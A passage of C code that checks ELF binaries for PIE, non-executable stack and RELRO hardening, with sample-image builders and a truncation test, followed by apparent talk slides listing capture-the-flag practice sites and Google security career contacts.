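    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_phentsize != sizeof(Elf64_Phdr))
        return -1;
    /* Bounds-check the program header table before trusting e_phoff/e_phnum:
     * a parser that reads attacker-supplied headers is itself an attack surface. */
    if (eh.e_phoff > len ||
        (size_t)eh.e_phnum * sizeof(Elf64_Phdr) > len - eh.e_phoff)
        return -1;

    out->pie = (eh.e_type == ET_DYN);
    out->nx_stack = 0;
    out->relro = 0;
    for (size_t i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        memcpy(&ph, img + eh.e_phoff + i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_GNU_STACK)
            out->nx_stack = (ph.p_flags & PF_X) == 0;
        else if (ph.p_type == PT_GNU_RELRO)
            out->relro = 1;
    }
    return 0;
}

/* Build a constructed minimal image (header plus one or two program headers)
 * so the checker can be exercised without a binary on disk. Returns the
 * image length, or 0 if buf is too small. */
size_t build_sample_elf(unsigned char *buf, size_t cap,
                        int pie, int exec_stack, int relro)
{
    Elf64_Ehdr eh;
    Elf64_Phdr ph[2];
    size_t nph = 0;
    memset(&eh, 0, sizeof eh);
    memset(ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = pie ? ET_DYN : ET_EXEC;
    eh.e_machine = EM_X86_64;
    eh.e_version = EV_CURRENT;
    eh.e_ehsize = sizeof eh;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof(Elf64_Phdr);

    ph[nph].p_type = PT_GNU_STACK;
    ph[nph].p_flags = PF_R | PF_W | (exec_stack ? PF_X : 0);
    nph++;
    if (relro) {
        ph[nph].p_type = PT_GNU_RELRO;
        ph[nph].p_flags = PF_R;
        nph++;
    }
    eh.e_phnum = (Elf64_Half)nph;

    size_t total = sizeof eh + nph * sizeof(Elf64_Phdr);
    if (cap < total)
        return 0;
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, ph, nph * sizeof(Elf64_Phdr));
    return total;
}

/* Build a sample with the given properties and return a 3-bit summary
 * (pie << 2 | nx_stack << 1 | relro), or -1 on parse failure. */
int sample_summary(int pie, int exec_stack, int relro)
{
    unsigned char img[sizeof(Elf64_Ehdr) + 2 * sizeof(Elf64_Phdr)];
    struct hardening h;
    size_t n = build_sample_elf(img, sizeof img, pie, exec_stack, relro);
    if (n == 0 || inspect_elf64(img, n, &h) != 0)
        return -1;
    return (h.pie << 2) | (h.nx_stack << 1) | h.relro;
}

/* Feed a truncated image and confirm the parser refuses it instead of
 * reading past the end of the buffer. Returns 1 if it was rejected. */
int truncated_rejected(void)
{
    unsigned char img[sizeof(Elf64_Ehdr) + 2 * sizeof(Elf64_Phdr)];
    struct hardening h;
    size_t n = build_sample_elf(img, sizeof img, 1, 0, 1);
    return n > 0 && inspect_elf64(img, n - 1, &h) == -1;
}
```

To inspect a real binary, read the file into memory and pass it to inspect_elf64; this is the same information tools such as checksec report. PT_GNU_RELRO on its own corresponds to partial RELRO, which leaves the lazily-resolved GOT entries writable; full RELRO additionally needs DT_BIND_NOW (or DF_BIND_NOW in DT_FLAGS) in the dynamic section, which this example does not parse.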
32. Want to try it out?
Capture the Flag:
https://capturetheflag.withgoogle.com
https://ctftime.org
https://picoctf.com
Wargames:
https://github.com/zardus/wargame-nexus
https://pwnable.kr
https://overthewire.org
Community:
CTF players Discord: https://discord.gg/ArjWjvctft
34. Interested in Google?
Internships and full-time positions:
https://careers.google.com/students
Questions about working at Google, specifically security:
Email zetatwo@google.com or Twitter @zetatwo